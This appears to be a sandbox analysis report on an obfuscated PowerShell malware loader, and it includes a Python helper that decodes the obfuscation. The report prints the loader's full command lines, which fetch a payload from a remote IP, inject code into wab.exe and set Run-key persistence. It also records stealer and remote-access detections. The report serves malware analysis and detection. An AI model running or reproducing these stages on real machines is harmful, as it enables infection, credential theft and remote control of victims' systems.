';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra 
aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA00347 push esi; retf 2_2_00007FFD9BA00376
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA00327 pushad ; retf 2_2_00007FFD9BA00346
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA04E2B push ss; retf 2_2_00007FFD9BA04E46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA04D8B push ss; retf 2_2_00007FFD9BA04E46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA0018D push ds; retf 2_2_00007FFD9BA001B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA00108 push ds; retf 2_2_00007FFD9BA001B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA0792D push ebx; retf 2_2_00007FFD9BA0796A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA000BD pushad ; iretd 2_2_00007FFD9BA000C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2AD81 push FFFFFF8Bh; iretd 5_2_07D2AD83
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2B11F push FFFFFF8Bh; iretd 5_2_07D2B121
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D200D1 push eax; iretd 5_2_07D200ED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2AAFA push FFFFFF8Bh; iretd 5_2_07D2AB09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2AA98 push FFFFFF8Bh; iretd 5_2_07D2AA9D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2B0B3 push FFFFFF8Bh; iretd 5_2_07D2B0B5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D20ABF push eax; mov dword ptr [esp], ecx 5_2_07D20AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D22C74 push FFFFFF8Bh; iretd 5_2_07D22C7D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2AC7B push FFFFFF8Bh; iretd 5_2_07D2AC89
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D2007F push eax; iretd 5_2_07D200ED
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Stagenes
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07D28A88 sldt word ptr [eax] 5_2_07D28A88
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5446
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4432
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6545
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3089
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2844
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep count: 6545 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep count: 3089 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7460 Thread sleep time: -30000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9168 Thread sleep count: 2844 > 30
              Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 2844 delay: -5
              Source: svchost.exe, 00000008.00000002.2883874527.000002087C858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2882848775.000002087742B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
              Source: powershell.exe, 00000002.00000002.2507847603.00000210C4F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0495404F LdrInitializeThunk,Sleep,NtProtectVirtualMemory,LdrInitializeThunk, 15_2_0495404F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4030000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: C7FEE4
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau 
oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra 
aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplH
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
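The process-creation entries above document two things a responder wants to reproduce: the `Handig` string obfuscation (every fifth character of a dictionary-word blob, starting at index 4, one character per step, loop bound `Length-1`, then handed to `& iex` through `Xerotherm`), and a Run-key value that is not a program path but a `REG_EXPAND_SZ` string expanding an environment variable and pulling script text out of `HKCU:\Bundfloraernes`. The following Python is an added example, not code from the report or from the sample: it reimplements `Handig` with the parameters read from the command line, extracts and decodes every `Handig '...'` literal from a script, and flags the Run-value traits. The three short literals decoded here are copied from the command line above; the benign Run value and the `handig_encode` filler are constructed. One caveat: the rendered report collapses runs of spaces inside the longer quoted literals (for example `$Palmehavers`, `$Fordommes`), so those do not decode cleanly from the text as printed here; run the decoder against the original `.cmd` file.

```python
"""Triage helpers for the GuLoader-style PowerShell stages listed above.

Added example; not code from the report or the sample. Handig() parameters
come from the command line above ($Columbaries starts at 4, += 5,
Substring(i, $Nabolandenes = 1), loop while i -lt Length-1). The Run-value
heuristics are this example's own, not the sandbox's signatures.
"""
import re

HANDIG_START = 4   # $Columbaries = 4
HANDIG_STEP = 5    # $Columbaries += 5
HANDIG_WIDTH = 1   # $Nabolandenes = 1 -> Substring(i, 1)


def handig(blob: str) -> str:
    """Replicate Handig(): take one character out of every five, starting at
    index 4 and stopping before index Length-1 (the '-lt' bound)."""
    end = len(blob) - HANDIG_WIDTH
    return "".join(blob[i:i + HANDIG_WIDTH]
                   for i in range(HANDIG_START, end, HANDIG_STEP))


def handig_encode(plain: str, filler: str = "xyzw") -> str:
    """Inverse of handig(): four junk characters before every payload
    character plus one trailing junk character. Only used to build test
    vectors; the real sample pads with fragments of dictionary words."""
    return "".join(filler[:4] + ch for ch in plain) + " "


# A PowerShell single-quoted literal; '' is the only escape inside it.
_HANDIG_CALL = re.compile(r"[Hh]andig\s+'((?:[^']|'')*)'")


def decode_handig_calls(script: str) -> list:
    """Return (literal, decoded) pairs for every Handig '...' call in script."""
    pairs = []
    for m in _HANDIG_CALL.finditer(script):
        literal = m.group(1).replace("''", "'")
        pairs.append((literal, handig(literal)))
    return pairs


# Three literals copied verbatim from the command line above.
SAMPLE_SCRIPT = (
    "$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';"
    "$Problemanalysernes=Handig 'Uro.>Fe.l ';"
    "$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';"
)

# Run value written by the REG ADD above, and a constructed benign one.
RUN_VALUE = (r"%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path "
             r"'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)")
BENIGN_RUN_VALUE = r"C:\Program Files\Example\updater.exe /background"  # constructed

_RUN_SIGNALS = (
    ("starts with an environment variable, not an executable path",
     re.compile(r"^\s*%[^%]+%")),
    ("hidden-window switch (-w 1 / -windowstyle hidden)",
     re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)),
    ("fetches its payload from an HKCU value via Get-ItemProperty",
     re.compile(r"Get-ItemProperty\s+-Path\s+'?HKCU:", re.I)),
    ("executes a variable holding script text",
     re.compile(r"%\w+%\s*\(\s*\$\w+\s*\)")),
)


def run_value_signals(data: str) -> list:
    """Names of the loader traits present in one Run-key value."""
    return [name for name, rx in _RUN_SIGNALS if rx.search(data)]


if __name__ == "__main__":
    for literal, decoded in decode_handig_calls(SAMPLE_SCRIPT):
        print(f"{decoded!r:14} <- {literal!r}")   # 'User-Agent', '>', 'iex'
    print(run_value_signals(RUN_VALUE))             # all four traits
    print(run_value_signals(BENIGN_RUN_VALUE))      # []
```

Because `$Normalprisen` decodes to `iex` and `Xerotherm` runs `& ($Normalprisen) ($Drapers)`, every decoded `Handig` literal passed to `Xerotherm` is the next stage's PowerShell source; decoding them in order reconstructs that stage without executing anything. The Run-value checks are deliberately narrow (they key on the expand-string-plus-registry-payload shape rather than on the random variable names), so they survive the per-build renaming this loader family uses.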
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager64\WindowsPowerShell\v1.0\powershell.ex
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managera
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager6be
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.15.dr | Binary or memory string: [2024/05/02 17:22:16 Program Manager]
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 times)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 times)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (8 times)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (3 times)
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (2 times)
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (3 times)

              Stealing of Sensitive Information

              Source: Yara match | File source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Remote Access Functionality

              Source: Yara match | File source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
